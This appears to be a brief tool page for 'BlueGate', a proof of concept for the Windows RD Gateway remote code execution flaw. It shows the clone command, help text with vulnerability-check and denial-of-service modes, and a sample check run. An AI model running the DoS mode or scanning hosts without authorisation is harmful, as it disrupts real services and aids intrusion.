A remote code execution vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka ‘Windows Remote Desktop Gateway (RD Gateway) Remote Code Execution Vulnerability’.
git clone https://github.com/ollypwn/BlueGate.git
BlueGate.py [-h] -M {check,dos} [-P PORT] host
positional arguments:
host IP address of host
optional arguments:
-h, --help show this help message and exit
-M {check,dos}, --mode {check,dos}
Mode
-P PORT, --port PORT UDP port of RDG, default: 3391
$ python3 BlueGate.py -M check 10.10.10.10
[*] Checking if 10.10.10.10 is vulnerable...
[+] Host is vulnerable